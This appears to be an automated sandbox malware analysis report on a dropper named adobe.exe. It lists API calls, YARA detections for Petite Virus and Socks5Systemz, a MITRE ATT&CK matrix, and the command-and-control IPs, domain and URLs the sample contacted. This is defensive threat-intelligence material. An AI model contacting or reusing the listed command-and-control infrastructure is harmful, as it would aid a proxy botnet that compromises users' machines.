                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeCode function: 3_2_02A164DC RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,3_2_02A164DC
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeCode function: 3_2_02A294A8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_02A294A8
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_00477120 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,1_2_00477120
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_0042DFC4 AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,1_2_0042DFC4
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeCode function: 3_2_02A27FED cpuid 3_2_02A27FED
                Source: C:\Users\user\Desktop\adobe.exeCode function: GetLocaleInfoA,0_2_004051FC
                Source: C:\Users\user\Desktop\adobe.exeCode function: GetLocaleInfoA,0_2_00405248
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: GetLocaleInfoA,1_2_00408570
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: GetLocaleInfoA,1_2_004085BC
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_00457DE8 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,1_2_00457DE8
                Source: C:\Users\user\Desktop\adobe.exeCode function: 0_2_004026C4 GetSystemTime,0_2_004026C4
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_00454AC8 GetUserNameA,1_2_00454AC8
                Source: C:\Users\user\Desktop\adobe.exeCode function: 0_2_00405CE4 GetVersionExA,0_2_00405CE4

                Stealing of Sensitive Information

                barindex
                Yara detected Petite Virus
                Source: Yara matchFile source: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-TA1T4.tmp, type: DROPPED
                Source: Yara matchFile source: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-ETIM8.tmp, type: DROPPED
                Source: Yara matchFile source: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-G2Q7A.tmp, type: DROPPED
                Source: Yara matchFile source: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-SD2K4.tmp, type: DROPPED
                Yara detected Socks5Systemz
                Source: Yara matchFile source: 00000003.00000002.2904685361.00000000009DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: aviformattertool.exe PID: 7388, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected Petite Virus
                Source: Yara matchFile source: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-TA1T4.tmp, type: DROPPED
                Source: Yara matchFile source: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-ETIM8.tmp, type: DROPPED
                Source: Yara matchFile source: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-G2Q7A.tmp, type: DROPPED
                Source: Yara matchFile source: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-SD2K4.tmp, type: DROPPED
                Yara detected Socks5Systemz
                Source: Yara matchFile source: 00000003.00000002.2904685361.00000000009DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: aviformattertool.exe PID: 7388, type: MEMORYSTR

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
                Valid Accounts3
                Native API                		4
                Windows Service                		1
                Exploitation for Privilege Escalation                		1
                Deobfuscate/Decode Files or Information                		OS Credential Dumping1
                System Time Discovery                		Remote Services1
                Archive Collected Data                		Exfiltration Over Other Network Medium2
                Ingress Tool Transfer                		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without Authorization1
                System Shutdown/Reboot                		Acquire InfrastructureGather Victim Identity Information
                Default Accounts2
                Service Execution                		1
                Bootkit                		1
                Access Token Manipulation                		3
                Obfuscated Files or Information                		LSASS Memory1
                Account Discovery                		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth2
                Encrypted Channel                		SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
                Domain AccountsAtLogon Script (Windows)4
                Windows Service                		23
                Software Packing                		Security Account Manager1
                File and Directory Discovery                		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                Non-Standard Port                		Data Encrypted for ImpactDNS ServerEmail Addresses
                Local AccountsCronLogin Hook2
                Process Injection                		1
                Masquerading                		NTDS35
                System Information Discovery                		Distributed Component Object ModelInput CaptureTraffic Duplication2
                Non-Application Layer Protocol                		Data DestructionVirtual Private ServerEmployee Names
                Cloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script21
                Virtualization/Sandbox Evasion                		LSA Secrets41
                Security Software Discovery                		SSHKeyloggingScheduled Transfer12
                Application Layer Protocol                		Data Encrypted for ImpactServerGather Victim Network Information
                Replication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Access Token Manipulation                		Cached Domain Credentials21
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureData Transfer Size LimitsMultiband CommunicationService StopBotnetDomain Properties
                External Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Process Injection                		DCSync11
                Application Window Discovery                		Windows Remote ManagementWeb Portal CaptureExfiltration Over C2 ChannelCommonly Used PortInhibit System RecoveryWeb ServicesDNS
                Drive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                Bootkit                		Proc Filesystem3
                System Owner/User Discovery                		Cloud ServicesCredential API HookingExfiltration Over Alternative ProtocolApplication Layer ProtocolDefacementServerlessNetwork Trust Dependencies
                Exploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                Remote System Discovery                		Direct Cloud VM ConnectionsData StagedExfiltration Over Symmetric Encrypted Non-C2 ProtocolWeb ProtocolsInternal DefacementMalvertisingNetwork Topology
                Supply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                System Network Configuration Discovery                		Shared WebrootLocal Data StagingExfiltration Over Asymmetric Encrypted Non-C2 ProtocolFile Transfer ProtocolsExternal DefacementCompromise InfrastructureIP Addresses

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                adobe.exe100%AviraHEUR/AGEN.1332570

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\ProgramData\JSON Nested Objects 66\JSON Nested Objects 66.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\7z.exe (copy)0%ReversingLabs
                C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\7z.exe (copy)0%VirustotalBrowse
                C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\OptimFROG.dll (copy)0%ReversingLabs
                C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\OptimFROG.dll (copy)0%VirustotalBrowse
                C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bass_fx.dll (copy)0%ReversingLabs
                C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bass_fx.dll (copy)0%VirustotalBrowse
                C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bass_ofr.dll (copy)0%ReversingLabs
                C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bass_ofr.dll (copy)1%VirustotalBrowse
                C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bass_tta.dll (copy)0%ReversingLabs
                C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bass_tta.dll (copy)1%VirustotalBrowse
                C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\basscd.dll (copy)3%ReversingLabs
                C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\basscd.dll (copy)0%VirustotalBrowse
                C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bassflac.dll (copy)0%ReversingLabs
                C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bassflac.dll (copy)0%VirustotalBrowse
                C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bassmidi.dll (copy)0%ReversingLabs
                C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bassmidi.dll (copy)0%VirustotalBrowse
                C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bassmix.dll (copy)0%ReversingLabs
                C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bassmix.dll (copy)0%VirustotalBrowse
                C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bassopus.dll (copy)3%ReversingLabs
                C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bassopus.dll (copy)0%VirustotalBrowse
                C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\basswma.dll (copy)0%ReversingLabs
                C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\basswma.dll (copy)0%VirustotalBrowse
                C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\basswv.dll (copy)3%ReversingLabs
                C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\basswv.dll (copy)0%VirustotalBrowse
                C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\d_writer.dll (copy)0%ReversingLabs
                C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\d_writer.dll (copy)0%VirustotalBrowse
                C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\da.dll (copy)0%ReversingLabs
                C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\da.dll (copy)0%VirustotalBrowse
                C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\daiso.dll (copy)0%ReversingLabs
                C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\daiso.dll (copy)0%VirustotalBrowse
                C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\dsd2.dll (copy)0%ReversingLabs
                C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\dsd2.dll (copy)0%VirustotalBrowse
                C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\dsd2pcmt.dll (copy)0%ReversingLabs
                C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\dsd2pcmt.dll (copy)0%VirustotalBrowse

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://sectigo.com/CPS00%URL Reputationsafe
                http://ocsp.sectigo.com00%URL Reputationsafe
                http://www.mp3dev.org/ID3Error0%URL Reputationsafe
                http://ocsps.ssl.com00%URL Reputationsafe
                http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
                http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
                http://185.196.8.22/0%URL Reputationsafe
                http://www.remobjects.com/psU0%URL Reputationsafe
                http://LosslessAudio.org/00%URL Reputationsafe
                http://lame.sf.net32bits0%URL Reputationsafe
                http://www.mp3dev.org/0%URL Reputationsafe
                http://www.remobjects.com/ps0%URL Reputationsafe
                http://ocsps.ssl.com0Q0%URL Reputationsafe
                http://185.196.8.22/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14100%Avira URL Cloudmalware
                http://www.innosetup.com/0%Avira URL Cloudsafe
                http://185.196.8.22/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f100%Avira URL Cloudmalware
                http://bfjesdr.com/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c645db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608efa10c2ec9c9d3c0%Avira URL Cloudsafe
                http://185.196.8.22/nq100%Avira URL Cloudmalware
                http://www.mpg123.de0%Avira URL Cloudsafe
                http://bfjesdr.com/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce6691110%Avira URL Cloudsafe
                http://www.innosetup.com/2%VirustotalBrowse
                http://www.mpg123.de0%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                bfjesdr.com
                		185.196.8.22
                		truefalse
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://bfjesdr.com/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c645db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608efa10c2ec9c9d3cfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://bfjesdr.com/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111false
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.innosetup.com/adobe.tmp, adobe.tmp, 00000001.00000000.1647787530.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-D26SF.tmp.1.dr, adobe.tmp.0.drfalse
                  • 2%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://gcc.gnu.org/bugs/):is-L5R6H.tmp.1.drfalse
                    		high
                    http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0is-RTU9Q.tmp.1.drfalse
                      		high
                      https://sectigo.com/CPS0is-JAMVB.tmp.1.drfalse
                      • URL Reputation: safe
                      		unknown
                      http://ocsp.sectigo.com0is-JAMVB.tmp.1.drfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.mp3dev.org/ID3Erroris-R0SOB.tmp.1.drfalse
                      • URL Reputation: safe
                      		unknown
                      http://185.196.8.22/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14aviformattertool.exe, 00000003.00000002.2904440169.00000000008AA000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      		unknown
                      http://185.196.8.22/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874faviformattertool.exe, 00000003.00000002.2905692727.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, aviformattertool.exe, 00000003.00000002.2905960096.000000000380C000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      		unknown
                      http://ocsps.ssl.com0is-RTU9Q.tmp.1.drfalse
                      • URL Reputation: safe
                      		unknown
                      http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sis-JAMVB.tmp.1.drfalse
                      • URL Reputation: safe
                      		unknown
                      http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#is-JAMVB.tmp.1.drfalse
                      • URL Reputation: safe
                      		unknown
                      http://185.196.8.22/aviformattertool.exe, 00000003.00000002.2904440169.00000000008AA000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://185.196.8.22/nqaviformattertool.exe, 00000003.00000002.2904440169.00000000008AA000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      		unknown
                      http://www.mpg123.deis-B8D2L.tmp.1.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://crls.ssl.com/ssl.com-rsa-RootCA.crl0is-RTU9Q.tmp.1.drfalse
                        		high
                        http://www.remobjects.com/psUadobe.exe, 00000000.00000003.1647104084.00000000024C0000.00000004.00001000.00020000.00000000.sdmp, adobe.exe, 00000000.00000003.1647263045.0000000002298000.00000004.00001000.00020000.00000000.sdmp, adobe.tmp, 00000001.00000000.1647787530.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-D26SF.tmp.1.dr, adobe.tmp.0.drfalse
                        • URL Reputation: safe
                        		unknown
                        http://lame.sf.netis-R0SOB.tmp.1.drfalse
                          		high
                          http://mingw-w64.sourceforge.net/Xis-OJAID.tmp.1.drfalse
                            		high
                            https://www.ssl.com/repository0is-RTU9Q.tmp.1.drfalse
                              		high
                              http://LosslessAudio.org/0is-NLBLP.tmp.1.drfalse
                              • URL Reputation: safe
                              		unknown
                              http://lame.sf.net32bitsis-R0SOB.tmp.1.drfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.mp3dev.org/is-R0SOB.tmp.1.drfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.remobjects.com/psadobe.exe, 00000000.00000003.1647104084.00000000024C0000.00000004.00001000.00020000.00000000.sdmp, adobe.exe, 00000000.00000003.1647263045.0000000002298000.00000004.00001000.00020000.00000000.sdmp, adobe.tmp, adobe.tmp, 00000001.00000000.1647787530.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-D26SF.tmp.1.dr, adobe.tmp.0.drfalse
                              • URL Reputation: safe
                              		unknown
                              http://crls.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.crl0is-RTU9Q.tmp.1.drfalse
                                		high
                                http://ocsps.ssl.com0Qis-RTU9Q.tmp.1.drfalse
                                • URL Reputation: safe
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                185.196.8.22
                                		bfjesdr.comSwitzerland
                                		34888SIMPLECARRER2ITfalse
                                65.109.80.185
                                		unknownUnited States
                                		11022ALABANZA-BALTUSfalse

                                General Information

                                Joe Sandbox version:38.0.0 Ammolite
                                Analysis ID:1374165
                                Start date and time:2024-01-13 06:31:06 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 7m 0s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:8
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:adobe.exe
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@7/102@1/2
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 93%
                                • Number of executed functions: 204
                                • Number of non-executed functions: 259
                                Cookbook Comments:
                                • Found application associated with file extension: .exe

                                Warnings

                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                06:32:31API Interceptor346781x Sleep call for process: aviformattertool.exe modified

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                185.196.8.22Mnw1ycGC86.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Petite Virus, SmokeLoader, Socks5Systemz, VidarBrowse
                                  Eks2sIqVXU.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Petite Virus, SmokeLoader, Socks5Systemz, VidarBrowse
                                    SecuriteInfo.com.Heuristic.HEUR.AGEN.1332570.28515.9783.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                      nuMb1lvY7r.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                        fXkyYwWmQN.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                          DDW1MYBYgo.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                            XA8GMaaL52.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                              DqhHo6K94H.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                scruurP1Ht.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                  hMfGY6bjrA.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                    Y1qP3rL3j7.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                      9u7RHI3bGw.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                        j2po8ek0US.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                          dG5B3oQKV8.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                            E6Bljk3z1F.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                              bGP2DebTbT.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                aneRE7M79c.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                  7f98dN1eC5.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                    PK11kli186.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                      UviATPIUxo.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                        65.109.80.185tuc6.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                          Mnw1ycGC86.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Petite Virus, SmokeLoader, Socks5Systemz, VidarBrowse
                                                                            Eks2sIqVXU.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Petite Virus, SmokeLoader, Socks5Systemz, VidarBrowse
                                                                              SecuriteInfo.com.Heuristic.HEUR.AGEN.1332570.28515.9783.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                nuMb1lvY7r.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                  fXkyYwWmQN.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                    DDW1MYBYgo.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                      XA8GMaaL52.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                        DqhHo6K94H.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                          scruurP1Ht.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                            hMfGY6bjrA.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                              Y1qP3rL3j7.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                j2po8ek0US.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                  dG5B3oQKV8.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                    aneRE7M79c.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                      PK11kli186.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                        k1g5QozhKy.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                          JM9bMa9OuC.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                            3o57lm41vm.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                              KGNPup2nbc.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse

                                                                                                                Domains

                                                                                                                No context

                                                                                                                ASNs

                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                SIMPLECARRER2ITMnw1ycGC86.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Petite Virus, SmokeLoader, Socks5Systemz, VidarBrowse
                                                                                                                • 185.196.8.22
                                                                                                                Eks2sIqVXU.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Petite Virus, SmokeLoader, Socks5Systemz, VidarBrowse
                                                                                                                • 185.196.8.22
                                                                                                                SecuriteInfo.com.Heuristic.HEUR.AGEN.1332570.28515.9783.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                                • 185.196.8.22
                                                                                                                nuMb1lvY7r.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                                • 185.196.8.22
                                                                                                                fXkyYwWmQN.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                                • 185.196.8.22
                                                                                                                DDW1MYBYgo.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                                • 185.196.8.22
                                                                                                                XA8GMaaL52.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                                • 185.196.8.22
                                                                                                                DqhHo6K94H.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                                • 185.196.8.22
                                                                                                                scruurP1Ht.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                                • 185.196.8.22
                                                                                                                hMfGY6bjrA.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                                • 185.196.8.22
                                                                                                                Y1qP3rL3j7.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                                • 185.196.8.22
                                                                                                                9u7RHI3bGw.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                                • 185.196.8.22
                                                                                                                j2po8ek0US.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                                • 185.196.8.22
                                                                                                                dG5B3oQKV8.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                                • 185.196.8.22
                                                                                                                E6Bljk3z1F.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                                • 185.196.8.22
                                                                                                                bGP2DebTbT.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                                • 185.196.8.22
                                                                                                                aneRE7M79c.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                                • 185.196.8.22
                                                                                                                7f98dN1eC5.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                                • 185.196.8.22
                                                                                                                PK11kli186.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                                • 185.196.8.22
                                                                                                                UviATPIUxo.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                                • 185.196.8.22
                                                                                                                ALABANZA-BALTUStuc6.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                                • 65.109.80.185
                                                                                                                godTavyAZD.elfGet hashmaliciousMiraiBrowse
                                                                                                                • 64.176.126.31
                                                                                                                Mnw1ycGC86.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Petite Virus, SmokeLoader, Socks5Systemz, VidarBrowse
                                                                                                                • 65.109.80.185
                                                                                                                Eks2sIqVXU.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Petite Virus, SmokeLoader, Socks5Systemz, VidarBrowse
                                                                                                                • 65.109.80.185
                                                                                                                SecuriteInfo.com.Heuristic.HEUR.AGEN.1332570.28515.9783.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                                • 65.109.80.185
                                                                                                                nuMb1lvY7r.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                                • 65.109.80.185
                                                                                                                fXkyYwWmQN.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                                • 65.109.80.185
                                                                                                                DDW1MYBYgo.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                                • 65.109.80.185
                                                                                                                XA8GMaaL52.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                                • 65.109.80.185
